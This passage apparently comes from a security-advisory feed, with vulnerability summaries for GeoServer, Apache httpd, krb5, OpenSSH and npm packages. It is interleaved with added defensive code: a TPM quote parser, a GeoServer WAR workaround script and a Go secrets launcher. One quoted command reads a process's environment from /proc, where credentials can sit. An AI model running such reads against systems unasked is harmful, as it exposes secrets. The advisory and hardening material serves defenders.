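def _tpm2b(buf: bytes, off: int):
    """Read a TPM2B (big-endian UINT16 size followed by that many bytes)."""
    if off + 2 > len(buf):
        raise AttestError("truncated TPM2B size field")
    (size,) = struct.unpack_from(">H", buf, off)
    off += 2
    if off + size > len(buf):
        raise AttestError("truncated TPM2B body")
    return buf[off:off + size], off + size


def parse_quote_attest(buf: bytes) -> dict:
    """Parse the TPMS_ATTEST header of a quote, enforcing magic and type first."""
    if len(buf) < 6:
        raise AttestError("blob shorter than magic + type")
    magic, attest_type = struct.unpack_from(">IH", buf, 0)
    if magic != TPM_GENERATED_VALUE:
        # The check CVE-2024-29040 describes as missing: a structure that was not
        # TPM-generated must never be treated as a quote.
        raise AttestError(f"magic 0x{magic:08x} != TPM_GENERATED_VALUE")
    if attest_type != TPM_ST_ATTEST_QUOTE:
        raise AttestError(f"attestation type 0x{attest_type:04x} is not TPM_ST_ATTEST_QUOTE")
    off = 6
    qualified_signer, off = _tpm2b(buf, off)     # TPM2B_NAME of the signing key
    extra_data, off = _tpm2b(buf, off)           # TPM2B_DATA: the verifier's nonce
    if off + 17 + 8 > len(buf):
        raise AttestError("truncated clockInfo / firmwareVersion")
    clock, reset_count, restart_count, safe = struct.unpack_from(">QIIB", buf, off)
    off += 17
    (firmware_version,) = struct.unpack_from(">Q", buf, off)
    off += 8
    return {
        "qualifiedSigner": qualified_signer,
        "extraData": extra_data,
        "clock": clock,
        "resetCount": reset_count,
        "restartCount": restart_count,
        "safe": safe,
        "firmwareVersion": firmware_version,
        "attested": buf[off:],                   # TPMS_QUOTE_INFO, left opaque here
    }


def quote_is_acceptable(buf: bytes, expected_nonce: bytes) -> bool:
    """True only for a TPM-generated quote that carries the nonce we issued."""
    try:
        info = parse_quote_attest(buf)
    except AttestError:
        return False
    return info["extraData"] == expected_nonce


def build_attest(magic: int, nonce: bytes, attested: bytes = b"") -> bytes:
    """Construct a TPMS_ATTEST blob for testing; this is not output from a real TPM."""
    signer = b"\x00\x0b" + b"\x11" * 32          # TPM2B_NAME body: TPM_ALG_SHA256 + 32-byte digest
    out = struct.pack(">IH", magic, TPM_ST_ATTEST_QUOTE)
    out += struct.pack(">H", len(signer)) + signer
    out += struct.pack(">H", len(nonce)) + nonce
    out += struct.pack(">QIIB", 1_000_000, 1, 0, 1)   # clockInfo (arbitrary values)
    out += struct.pack(">Q", 0x0102030405060708)       # firmwareVersion (arbitrary)
    return out + attested
```

The magic and nonce checks are necessary but not sufficient: a real verifier also checks the signature over this blob with a key whose name matches `qualifiedSigner`, and compares the PCR digest inside `attested` against the expected values.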
28.06.2024 22:14:48ubuntu[USN-6851-2] Netplan regressionUSN-6851-1 caused systemctl enable to failhttps://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6851-2
28.06.2024 19:08:04ubuntu[USN-6844-2] CUPS regressionUSN-6844-1 caused the cupsd daemon to never starthttps://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6844-2
28.06.2024 06:00:12ubuntu[USN-6855-1] libcdio vulnerabilitylibcdio could be made to crash or run programs as your login if it opened a specially crafted file.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6855-1
29.06.2024 02:15:11alpinelinux[ALPINE:CVE-2024-37371] krb5 vulnerability[From CVE-2024-37371] In MIT Kerberos 5 (aka krb5) before 1.21.3, an attacker can cause invalid memory reads during GSS message token handling by sending message tokens with invalid length fields.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-37371
29.06.2024 01:15:02alpinelinux[ALPINE:CVE-2024-37370] krb5 vulnerability[From CVE-2024-37370] In MIT Kerberos 5 (aka krb5) before 1.21.3, an attacker can modify the plaintext Extra Count field of a confidential GSS krb5 wrap token, causing the unwrapped token to appear truncated to the application.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-37370
01.07.2024 23:34:51maven[MAVEN:GHSA-6JJ6-GM7P-FCVV] Remote Code Execution (RCE) vulnerability in geoserver (critical)### SummaryMultiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation due to unsafely evaluating property names as XPath expressions.### DetailsThe GeoTools library API that GeoServer calls evaluates property/attribute names for feature types in a way that unsafely passes them to the commons-jxpath library which can execute arbitrary code when evaluating XPath expressions. This XPath evaluation is intended to be used only by complex feature types (i.e., Application Schema data stores) but is incorrectly being applied to simple feature types as well which makes this vulnerability apply to **ALL** GeoServer instances.### PoCNo public PoC is provided but this vulnerability has been confirmed to be exploitable through WFS GetFeature, WFS GetPropertyValue, WMS GetMap, WMS GetFeatureInfo, WMS GetLegendGraphic and WPS Execute requests.### ImpactThis vulnerability can lead to executing arbitrary code.### WorkaroundA workaround exists by removing the `gt-complex-x.y.jar` file from the GeoServer where `x.y` is the GeoTools version (e.g., `gt-complex-31.1.jar` if running GeoServer 2.25.1). This will remove the vulnerable code from GeoServer but may break some GeoServer functionality or prevent GeoServer from deploying if the gt-complex module is needed by an extension you are using:Mitigation for `geoserver.war` deploy:1. Stop the application server2. Unzip `geoserver.war` into a directory3. Locate the file `WEB-INF/lib/gt-complex-x.y.jar` and remove4. Zip the directory into a new `geoserver.war`5. Restart the application serverMitigation for GeoServer binary:1. Stop Jetty2. Locate the file `webapps/geoserver/WEB-INF/lib/gt-complex-x.y.jar` and remove3. Restart JettyThe following extensions and community modules are known to have a direct dependency on the `gt-complex` jar and are not expected to function properly without it. This is not a comprehensive list and additional GeoServer functionality may be dependent on the availability of the `gt-complex` jar:* Extensions: Application Schema, Catalog Services for the Web, MongoDB Data Store* Community Modules: Features-Templating, OGC API Modules, Smart Data Loader, SOLR Data StorePatch available for prior releases:1. Patched `gt-app-schema`, `gt-complex` and `gt-xsd-core` jars may be downloaded from the release page for GeoServer: 2.25.1, 2.24.3, 2.24.2, 2.23.2, 2.21.5, 2.20.7, 2.20.4, 2.19.2, 2.18.0.2. To use, follow the instructions above to locate the `WEB-INF/lib` folder3. Replace `gt-app-schema`, `gt-complex` and `gt-xsd-core` jars with those supplied by the patch### Referenceshttps://github.com/geotools/geotools/security/advisories/GHSA-w3pj-wh35-fq8whttps://osgeo-org.atlassian.net/browse/GEOT-7587https://github.com/geotools/geotools/pull/4797https://github.com/Warxim/CVE-2022-41852?tab=readme-ov-file#workaround-for-cve-2022-41852https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-6JJ6-GM7P-FCVV
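The WAR mitigation in the GeoServer entry above is a five-step manual procedure (stop, unzip, delete `WEB-INF/lib/gt-complex-x.y.jar`, rezip, restart). The following is an added example, not code from the GeoServer project or the advisory, that performs the unzip/delete/rezip steps as one operation on a copy of the WAR, reports exactly which jar it removed, and warns when a `gt-app-schema` jar is present, since the advisory names the Application Schema extension as dependent on `gt-complex`. Stopping and restarting the application server remain manual steps. The `make_fake_war` helper builds a constructed stand-in WAR for the self-test; the jar version numbers in it and the choice of `gt-app-schema` as the only dependency hint are assumptions. Treat this as the advisory's workaround, not as a substitute for the patched jars or an upgraded release.

```python
import os
import re
import shutil
import sys
import tempfile
import zipfile

# The jar the advisory tells you to remove: WEB-INF/lib/gt-complex-<geotools-version>.jar
GT_COMPLEX_RE = re.compile(r"^WEB-INF/lib/gt-complex-[\d.]+(?:-[\w.]+)?\.jar$")
# Jar prefixes whose presence means an extension will break without gt-complex.
# Only gt-app-schema is named as a jar in the advisory; this tuple is an assumption.
DEPENDS_ON_GT_COMPLEX = ("WEB-INF/lib/gt-app-schema-",)


def strip_gt_complex(war_path: str, dry_run: bool = False):
    """Rewrite war_path without gt-complex-*.jar; return (removed, warnings).

    Stop the application server before calling this, and keep a copy of the
    original WAR: this is the advisory's workaround, not the vendor patch.
    """
    removed, warnings = [], []
    with zipfile.ZipFile(war_path) as src:
        for name in src.namelist():
            if GT_COMPLEX_RE.match(name):
                removed.append(name)
            elif name.startswith(DEPENDS_ON_GT_COMPLEX):
                warnings.append(f"{name} needs gt-complex; that extension will not work without it")
        if not removed or dry_run:
            return removed, warnings
        fd, tmp_path = tempfile.mkstemp(suffix=".war", dir=os.path.dirname(os.path.abspath(war_path)))
        os.close(fd)
        with zipfile.ZipFile(tmp_path, "w") as dst:
            for info in src.infolist():
                if info.filename in removed:
                    continue
                dst.writestr(info, src.read(info.filename))   # keeps per-entry compression and mtime
    shutil.copymode(war_path, tmp_path)
    os.replace(tmp_path, war_path)                            # atomic swap on the same filesystem
    return removed, warnings


def make_fake_war(path: str, version: str = "31.1", with_app_schema: bool = False) -> None:
    """Build a stand-in WAR with the jar layout the advisory describes (constructed test data)."""
    with zipfile.ZipFile(path, "w", compression=zipfile.ZIP_DEFLATED) as z:
        z.writestr("WEB-INF/web.xml", "<web-app/>")
        z.writestr(f"WEB-INF/lib/gt-complex-{version}.jar", b"placeholder, not a real jar")
        z.writestr(f"WEB-INF/lib/gt-main-{version}.jar", b"placeholder, not a real jar")
        if with_app_schema:
            z.writestr(f"WEB-INF/lib/gt-app-schema-{version}.jar", b"placeholder, not a real jar")


def demo():
    """Run the workaround against a fake WAR; return (removed, warnings, remaining entries)."""
    workdir = tempfile.mkdtemp()
    try:
        war = os.path.join(workdir, "geoserver.war")
        make_fake_war(war, with_app_schema=True)
        removed, warnings = strip_gt_complex(war)
        with zipfile.ZipFile(war) as z:
            remaining = sorted(z.namelist())
            assert z.testzip() is None               # rewritten archive is intact
    finally:
        shutil.rmtree(workdir)
    return removed, warnings, remaining


if __name__ == "__main__":
    if len(sys.argv) != 2:
        sys.exit("usage: strip_gt_complex.py /path/to/geoserver.war")
    removed, warnings = strip_gt_complex(sys.argv[1])
    print("removed:", removed or "nothing (gt-complex not found)")
    for w in warnings:
        print("warning:", w)
```

Run it with `dry_run=True` first on a production WAR to see what would be removed and which extensions would be affected; if `gt-app-schema` or any of the listed community modules is in use, apply the patched jars instead of this workaround.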
01.07.2024 23:33:14go[GO-2024-2912] Docker CLI leaks private registry credentials to registry-1.docker.io in github.com/docker/cli (high)https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2912
01.07.2024 23:33:14go[GO-2024-2918] Azure Identity Libraries Elevation of Privilege Vulnerability in github.com/Azure/azure-sdk-for-go/sdk/azidentity (medium)https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2918
01.07.2024 23:31:12slackware[SSA:2024-183-01] openssh (high)New openssh packages are available for Slackware 15.0 and -current to fix a security issue.**Here are the details from the Slackware 15.0 ChangeLog**```patches/packages/openssh-9.8p1-i586-1_slack15.0.txz: Upgraded. This update fixes a security issue: Fix race condition resulting in potential remote code execution. For more information, see: https://www.qualys.com/2024/07/01/cve-2024-6387/regresshion.txt https://www.cve.org/CVERecord?id=CVE-2024-6387 (* Security fix *)```**Where to find the new packages**Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/openssh-9.8p1-i586-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/openssh-9.8p1-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssh-9.8p1-i586-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssh-9.8p1-x86_64-1.txz**MD5 signatures**Slackware 15.0 package:b4af120a303e9cc81f36efc530dfeb71 openssh-9.8p1-i586-1_slack15.0.txzSlackware x86_64 15.0 package:18c832397610ce2ba95fbe5bd42c0939 openssh-9.8p1-x86_64-1_slack15.0.txzSlackware -current package:c99e931319f87074cd75a6a24748919a n/openssh-9.8p1-i586-1.txzSlackware x86_64 -current package:79193544127ed638d7281552c6fcd15e n/openssh-9.8p1-x86_64-1.txz**Installation instructions**Upgrade the package as root:`# upgradepkg openssh-9.8p1-i586-1_slack15.0.txz`Next, restart the sshd daemon:`# sh /etc/rc.d/rc.sshd restart`https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-183-01
01.07.2024 22:24:05maven[MAVEN:GHSA-JHQX-5V5G-MPF3] Classpath resource disclosure in GWC Web Resource API on Windows / Tomcat (high)### ImpactIf GeoServer is deployed in the Windows operating system using an Apache Tomcat web application server, it is possible to bypass existing input validation in the GeoWebCache ByteStreamController class and read arbitrary classpath resources with specific file name extensions.If GeoServer is also deployed as a web archive using the data directory embedded in the geoserver.war file (rather than an external data directory), it will likely be possible to read specific resources to gain administrator privileges. However, it is very unlikely that production environments will be using the embedded data directory since, depending on how GeoServer is deployed, it will be erased and re-installed (which would also reset to the default password) either every time the server restarts or every time a new GeoServer WAR is installed and is therefore difficult to maintain. An external data directory will always be used if GeoServer is running in standalone mode (via an installer or a binary).### Patcheshttps://github.com/GeoWebCache/geowebcache/pull/1211### WorkaroundsChange environment:* Change from Windows operating system. This vulnerability depends on Windows file paths so Linux and Mac OS are not vulnerable.* Change from Apache Tomcat application server. Jetty and WildFly are confirmed to not be vulnerable. Other application servers have not been tested and may be vulnerable.Disable anonymous access to the embedded GeoWebCache administration and status pages:1. Navigate to **Security > Authentication** Page2. Locate **Filter Chains** heading3. Select the ``web`` filter chain (ant pattern ``/web/**,/gwc/rest/web/**,/``)4. Remove ``,/gwc/rest/web/**`` from the pattern (so that ``/web/**,/`` is left).5. Save the changes### References* CVE-Pendinghttps://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-JHQX-5V5G-MPF3
01.07.2024 22:20:59maven[MAVEN:GHSA-J59V-VGCR-HXVF] GeoServer's Server Status shows sensitive environmental variables and Java properties (moderate)GeoServer's Server Status page and REST API (at `/geoserver/rest/about/status`) lists *all* environment variables and Java properties to *any* GeoServer user with administrative rights as part of those modules' status message.These variables/properties can also contain sensitive information, such as database passwords or API keys/tokens, for example:* Data stores defined with [parameterized catalog settings][catalog] (`-DALLOW_ENV_PARAMETRIZATION=true`) which need a password or access key.* GeoServer's official Docker image [uses environment variables to configure PostgreSQL JNDI resources, including credentials][docker-jndi] (`POSTGRES_HOST`, `POSTGRES_USERNAME`, `POSTGRES_PASSWORD`)Additionally, many community-developed GeoServer container images `export` other credentials from their start-up scripts as environment variables to the GeoServer (`java`) process, such as:* GeoServer `admin` and master (`root`) passwords* Tomcat management application password* HTTPS/TLS certificate key store password* AWS S3 bucket access keysThe precise scope of the issue depends on which container image is used and how it is configured.> [!NOTE]> Some container images allow passing secrets as files (eg: `POSTGRES_PASSWORD_FILE`), or randomly generating passwords on start-up. 
While this is promoted as best-practice[^secret-files], if its start-up script [`export`s these as environment variables][bash-export] to GeoServer, they are **also** impacted by this issue.

[bash-export]: https://www.gnu.org/software/bash/manual/html_node/Bourne-Shell-Builtins.html#index-export
[catalog]: https://docs.geoserver.org/latest/en/user/datadirectory/configtemplate.html
[docker-jndi]: https://github.com/geoserver/docker/blob/master/README.md#how-to-enable-a-postgresql-jndi-resource

### Impact

The "about status" API endpoint (at `/geoserver/rest/about/status`), which powers the Server Status page, is only available to administrators.

Depending on the operating environment, administrators might have legitimate access to credentials in other ways, but this issue defeats more sophisticated controls (like break-glass access to secrets or role accounts).

By default, GeoServer only allows same-origin authenticated API access. This limits the scope for a third-party attacker to use an administrator's credentials to gain access to credentials (i.e. it requires XSS).

We were unable to determine any other conditions under which the GeoServer REST API may be available more broadly.

### Fixes / remediation

GeoServer 2.24.4 and 2.25.1 hide **all** environment variables and Java system properties *by default*, with *no further action required by GeoServer administrators*.

[There are new settings to allow an administrator to display these again][showing] – effectively **reverting** this security fix. We strongly recommend administrators leave these settings as-is, and use alternative mechanisms to access environment variables (instructions below).

If you're using GeoServer in a container runtime (such as Docker or Kubernetes) or from some other distributor's packages, you'll need to wait for the maintainer to update the version of GeoServer used in their image.

> [!WARNING]
> If you run GeoServer with [parameterized catalog settings][catalog] (`-DALLOW_ENV_PARAMETRIZATION=true`), a GeoServer administrator could use this to access any environment variable or Java property by including it in some field which is rendered by the UI (such as the description field), **even with this fix**.

[showing]: https://docs.geoserver.org/latest/en/user/production/config.html#showing-environment-variables-and-java-system-properties

### Advice for container / Docker image maintainers

Update container images to use GeoServer 2.24.4 or 2.25.1 to get the bug fix.

Please leave environment variables and Java system properties hidden by default. If you provide the option to re-enable it, [communicate the impact and risks][showing] so that users can make an informed choice.

Container images should practice "defence in depth", to limit the impact when it is configured to show environment variables and/or properties:

* Pass secrets to the container as either:
  * files which are only readable by the GeoServer process/UID, or,
  * references (identifiers) to a secret stored in a cloud provider's metadata or secret management service
* Pass secrets to GeoServer by generating configuration files as part of your start-up scripts, rather than passing variables/properties or relying on [parameterized catalog settings][catalog].
* Ensure any configuration files with secrets are not readable by other users.
* Clear all environment variables which contain secrets _before_ starting GeoServer. _Alternatively:_ start up GeoServer with *only* the environment variables it needs, and no secrets.
* **Don't** pass secrets as command-line flags – these are shown in `ps` to all users!

### Alternatives for displaying GeoServer's environment variables

* **On Linux,** you can get all environment variables [set at _start-up time_][linux-environ] for a running process with:

  ```sh
  tr '\0' '\n' < /proc/${GEOSERVER_PID}/environ
  ```

  (`/proc/<pid>/environ` reflects the environment the process was started with, and is only readable by the same UID or by root.)
* **On Windows,** [SysInternals' Process Explorer][proc-exp] can show running processes' environment variables.
* Current versions of **macOS** do not allow arbitrary access to other running processes' environment variables. Disabling these restrictions (on a macOS level) would significantly reduce the overall security of the system.

[linux-environ]: https://unix.stackexchange.com/a/70636
[proc-exp]: https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer

[^secret-files]: [Docker Compose: How to use secrets in Docker Compose](https://docs.docker.com/compose/use-secrets/), [Docker Swarm: Build support for Docker Secrets into your images](https://docs.docker.com/engine/swarm/secrets/#build-support-for-docker-secrets-into-your-images)

https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-J59V-VGCR-HXVF

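The container advice above (secrets as files, configuration generated at start-up with tight permissions, a scrubbed environment, and `/proc/<pid>/environ` as the way to inspect what a process was started with) can be carried out by a small launcher. The following is an added example written for this page in Go; it is not GeoServer's or the geoserver/docker image's own start-up script. The secrets directory `/run/secrets`, the property names `jdbc.user`/`jdbc.password`, the properties file path and the `java -jar start.jar` command line are assumptions for illustration.

```go
package main

// Added example, not GeoServer's own start-up script: a launcher that
// applies the advisory's defence-in-depth advice. The secrets directory,
// properties file and JVM command line below are hypothetical.

import (
	"bytes"
	"fmt"
	"log"
	"os"
	"os/exec"
	"path/filepath"
	"sort"
	"strings"
)

// LoadSecrets reads one secret per file from dir (the layout Docker Compose and
// Swarm secrets use); the file name becomes the key, trailing newlines are dropped.
func LoadSecrets(dir string) (map[string]string, error) {
	entries, err := os.ReadDir(dir)
	if err != nil {
		return nil, err
	}
	secrets := make(map[string]string, len(entries))
	for _, e := range entries {
		if e.IsDir() {
			continue
		}
		data, err := os.ReadFile(filepath.Join(dir, e.Name()))
		if err != nil {
			return nil, err
		}
		secrets[e.Name()] = strings.TrimRight(string(data), "\r\n")
	}
	return secrets, nil
}

// WriteProperties renders sorted key=value lines into a file created with mode
// 0600 (and re-tightened if it already existed), so other users on the host
// cannot read the credentials it contains.
func WriteProperties(path string, kv map[string]string) error {
	keys := make([]string, 0, len(kv))
	for k := range kv {
		keys = append(keys, k)
	}
	sort.Strings(keys)
	f, err := os.OpenFile(path, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, 0o600)
	if err != nil {
		return err
	}
	defer f.Close()
	if err := f.Chmod(0o600); err != nil {
		return err
	}
	for _, k := range keys {
		if _, err := fmt.Fprintf(f, "%s=%s\n", k, kv[k]); err != nil {
			return err
		}
	}
	return nil
}

// AllowlistEnv keeps only the named variables from environ, so the JVM starts
// with what it needs and never sees a DB_PASSWORD-style value the runtime exported.
func AllowlistEnv(environ, allow []string) []string {
	keep := make(map[string]bool, len(allow))
	for _, name := range allow {
		keep[name] = true
	}
	out := make([]string, 0, len(allow))
	for _, kv := range environ {
		name, _, _ := strings.Cut(kv, "=")
		if keep[name] {
			out = append(out, kv)
		}
	}
	return out
}

// ProcEnviron returns the start-up environment of a running Linux process: the
// same NUL-separated data the advisory's `tr '\0' '\n' < /proc/PID/environ` shows.
func ProcEnviron(pid int) ([]string, error) {
	data, err := os.ReadFile(fmt.Sprintf("/proc/%d/environ", pid))
	if err != nil {
		return nil, err
	}
	var vars []string
	for _, kv := range bytes.Split(data, []byte{0}) {
		if len(kv) > 0 {
			vars = append(vars, string(kv))
		}
	}
	return vars, nil
}

func main() {
	secrets, err := LoadSecrets("/run/secrets") // hypothetical mount point
	if err != nil {
		log.Fatal(err)
	}
	props := map[string]string{ // hypothetical property names
		"jdbc.user":     secrets["db_user"],
		"jdbc.password": secrets["db_password"],
	}
	if err := WriteProperties("/opt/geoserver/jdbc.properties", props); err != nil {
		log.Fatal(err)
	}
	cmd := exec.Command("java", "-jar", "start.jar") // hypothetical JVM command line
	cmd.Env = AllowlistEnv(os.Environ(), []string{"PATH", "JAVA_HOME", "GEOSERVER_DATA_DIR"})
	cmd.Stdout, cmd.Stderr = os.Stdout, os.Stderr
	log.Fatal(cmd.Run())
}
```

The allowlist is deliberately a list of names rather than a denylist of patterns such as `*PASSWORD*`: a secret exported under an unexpected name (an API token, a JNDI password) is dropped by default instead of slipping through. After start-up, `ProcEnviron(pid)` of the Java process should contain nothing but the allowlisted entries; if it does, the wrapper was bypassed and the secret would be visible on the Server Status page of an unpatched GeoServer.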
01.07.2024 22:15:05 | alpinelinux | [ALPINE:CVE-2024-38477] apache2 vulnerability
[From CVE-2024-38477] Null pointer dereference in mod_proxy in Apache HTTP Server 2.4.59 and earlier allows an attacker to crash the server via a malicious request. Users are recommended to upgrade to version 2.4.60, which fixes this issue.
https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-38477

01.07.2024 22:15:05 | alpinelinux | [ALPINE:CVE-2024-39573] apache2 vulnerability
[From CVE-2024-39573] Potential SSRF in mod_rewrite in Apache HTTP Server 2.4.59 and earlier allows an attacker to cause unsafe RewriteRules to unexpectedly set up URLs to be handled by mod_proxy. Users are recommended to upgrade to version 2.4.60, which fixes this issue.
https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-39573

01.07.2024 22:15:04 | alpinelinux | [ALPINE:CVE-2024-38472] apache2 vulnerability
[From CVE-2024-38472] SSRF in Apache HTTP Server on Windows allows an attacker to potentially leak NTLM hashes to a malicious server via SSRF and malicious requests or content. Users are recommended to upgrade to version 2.4.60, which fixes this issue. Note: Existing configurations that access UNC paths will have to configure the new directive "UNCList" to allow access during request processing.
https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-38472

01.07.2024 22:15:04 | alpinelinux | [ALPINE:CVE-2024-38473] apache2 vulnerability
[From CVE-2024-38473] Encoding problem in mod_proxy in Apache HTTP Server 2.4.59 and earlier allows request URLs with incorrect encoding to be sent to backend services, potentially bypassing authentication via crafted requests. Users are recommended to upgrade to version 2.4.60, which fixes this issue.
https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-38473

01.07.2024 22:15:04 | alpinelinux | [ALPINE:CVE-2024-38474] apache2 vulnerability
[From CVE-2024-38474] Substitution encoding issue in mod_rewrite in Apache HTTP Server 2.4.59 and earlier allows an attacker to execute scripts in directories permitted by the configuration but not directly reachable by any URL, or to obtain source disclosure of scripts meant only to be executed as CGI. Users are recommended to upgrade to version 2.4.60, which fixes this issue. Some RewriteRules that capture and substitute unsafely will now fail unless the rewrite flag "UnsafeAllow3F" is specified.
https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-38474

01.07.2024 22:15:04 | alpinelinux | [ALPINE:CVE-2024-38475] apache2 vulnerability
[From CVE-2024-38475] Improper escaping of output in mod_rewrite in Apache HTTP Server 2.4.59 and earlier allows an attacker to map URLs to filesystem locations that are permitted to be served by the server but are not intentionally/directly reachable by any URL, resulting in code execution or source code disclosure. Substitutions in server context that use a backreference or variable as the first segment of the substitution are affected. Some unsafe RewriteRules will be broken by this change, and the rewrite flag "UnsafePrefixStat" can be used to opt back in once the substitution has been confirmed to be appropriately constrained.
https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-38475

01.07.2024 22:15:04 | alpinelinux | [ALPINE:CVE-2024-38476] apache2 vulnerability
[From CVE-2024-38476] A vulnerability in the core of Apache HTTP Server 2.4.59 and earlier makes it vulnerable to information disclosure, SSRF or local script execution via backend applications whose response headers are malicious or exploitable. Users are recommended to upgrade to version 2.4.60, which fixes this issue.
https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-38476

01.07.2024 22:15:03 | alpinelinux | [ALPINE:CVE-2024-36387] apache2 vulnerability
[From CVE-2024-36387] Serving WebSocket protocol upgrades over an HTTP/2 connection could result in a null pointer dereference, leading to a crash of the server process, degrading performance.
https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-36387

02.07.2024 05:40:44 | npm | [NPM:GHSA-C2HR-CQG6-8J6R] ZDI-CAN-23894: Parse Server literalizeRegexPart SQL Injection Authentication Bypass Vulnerability (critical)

### Impact

This vulnerability allows SQL injection when Parse Server is configured to use the PostgreSQL database.

### Patches

The algorithm to detect SQL injection has been improved.

### Workarounds

None.

### References

- https://github.com/parse-community/parse-server/security/advisories/GHSA-c2hr-cqg6-8j6r
- https://github.com/parse-community/parse-server/pull/9167 (fix for Parse Server 7)
- https://github.com/parse-community/parse-server/pull/9168 (fix for Parse Server 6)

### Credits

- Smile Thanapattheerakul of Trend Micro (finder)
- Manuel Trezza (coordinator)

https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-C2HR-CQG6-8J6R

01.07.2024 21:16:17 | go | [GO-2024-2920] Denial of service vulnerability via the parseDirectives function in github.com/vektah/gqlparser
An issue in the vektah gqlparser open-source library allows a remote attacker to cause a denial of service via a crafted script to the parseDirectives function.
https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2920

01.07.2024 21:16:17 | go | [GO-2024-2921] HashiCorp Vault Incorrectly Validated JSON Web Tokens (JWT) Audience Claims in github.com/hashicorp/vault (low)
https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2921

01.07.2024 21:16:17 | go | [GO-2024-2930] RKE credentials are stored in the RKE1 Cluster state ConfigMap in github.com/rancher/rke
When RKE provisions a cluster, it stores the cluster state in a configmap called "full-cluster-state" inside the "kube-system" namespace of the cluster itself. This cluster state object contains information used to set up the K8s cluster, which may include sensitive data.
https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2930

01.07.2024 21:16:17 | go | [GO-2024-2936] PocketBase performs password auth and OAuth2 unverified email linking in github.com/pocketbase/pocketbase (medium)
https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2936

01.07.2024 21:16:17 | go | [GO-2024-2943] Lightning Network Daemon (LND)'s onion processing logic leads to a denial of service in github.com/lightningnetwork/lnd (medium)
https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2943

01.07.2024 19:00:00 | cisco | [CISCO-SA-NXOS-CMD-INJECTION-XD9OHYOP] Cisco NX-OS Software CLI Command Injection Vulnerability (medium)
A vulnerability in the CLI of Cisco NX-OS Software could allow an authenticated, local attacker to execute arbitrary commands as root on the underlying operating system of an affected device.

This vulnerability is due to insufficient validation of arguments that are passed to specific configuration CLI commands. An attacker could exploit this vulnerability by including crafted input as the argument of an affected configuration CLI command. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with the privileges of root.

Note: To successfully exploit this vulnerability on a Cisco NX-OS device, an attacker must have Administrator credentials.

Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.
https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-NXOS-CMD-INJECTION-XD9OHYOP

02.07.2024 01:34:45 | npm | [NPM:GHSA-88VR-HJQX-57QH] adolph_dudu ratio-swiper was discovered to contain a prototype pollution via the function extendDefaults (moderate)
adolph_dudu ratio-swiper v0.0.2 was discovered to contain a prototype pollution vulnerability via the function extendDefaults. This vulnerability allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via injecting arbitrary properties.
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-88VR-HJQX-57QH

02.07.2024 01:34:05 | npm | [NPM:GHSA-876P-C77M-X2HC] ag-grid-community were discovered to contain a prototype pollution via the _.mergeDeep function (moderate)
ag-grid-community v31.3.2 and ag-grid-enterprise v31.3.2 were discovered to contain a prototype pollution vulnerability via the _.mergeDeep function. This vulnerability allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via injecting arbitrary properties.
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-876P-C77M-X2HC

02.07.2024 00:52:12 | npm | [NPM:GHSA-W58V-R3CP-QR93] @amoy/common v was discovered to contain a prototype pollution via the function extend (moderate)
amoyjs amoy common v1.0.10 was discovered to contain a prototype pollution vulnerability via the function extend. This vulnerability allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via injecting arbitrary properties.
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-W58V-R3CP-QR93

02.07.2024 00:52:44 | npm | [NPM:GHSA-4WM9-3QMV-GVXJ] jsonic was discovered to contain a prototype pollution via the function empty (moderate)
rjrodger jsonic-next v2.12.1 was discovered to contain a prototype pollution vulnerability via the function empty. This vulnerability allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via injecting arbitrary properties.
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-4WM9-3QMV-GVXJ

02.07.2024 00:54:13 | npm | [NPM:GHSA-GC7M-596H-X57R] frappejs was discovered to contain a prototype pollution via the function registerView (moderate)
